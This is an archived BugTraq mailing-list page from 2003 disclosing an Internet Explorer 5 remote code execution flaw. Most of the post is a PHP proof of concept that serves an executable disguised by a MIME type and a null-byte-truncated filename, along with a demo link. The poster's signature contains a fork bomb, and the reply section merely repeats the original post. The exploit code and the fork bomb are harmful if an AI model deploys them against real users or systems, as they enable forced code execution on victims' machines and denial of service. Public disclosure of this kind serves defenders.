BugTraq
Back to list
|
Post reply
IE remote code execution
Oct 18 2003 10:15PM
Marcin Ulikowski (r3b00t tx pl)
(1 replies)
This code can execute any code remotely using IE - as you can see very simple.
// for IE 5, tested on default Windows 98SE installation
<?php
Header("Content-type: audio/midi");
Header("Content-Disposition: inline; filename=readme.txt%00code.exe");
readfile("code.exe");
?>
<noscript>
Here you have a demo:
http://r3b00t.tx.pl/iexec5.php
Can we expect more surprises like this one?
--
------------------------------
r3b00t ~ [http://r3b00t.tx.pl]
just do main(){for(;;)fork();}
------------------------------
[ reply ]
Re: IE remote code execution
Oct 20 2003 06:53PM
Jouko Pynnonen (jouko iki fi)
Privacy Statement
Copyright 2010, SecurityFocus
// for IE 5, tested on default Windows 98SE installation
<?php
Header("Content-type: audio/midi");
Header("Content-Disposition: inline; filename=readme.txt%00code.exe");
readfile("code.exe");
?>
<noscript>
Here you have a demo:
http://r3b00t.tx.pl/iexec5.php
Can we expect more surprises like this one?
--
------------------------------
r3b00t ~ [http://r3b00t.tx.pl]
just do main(){for(;;)fork();}
------------------------------
[ reply ]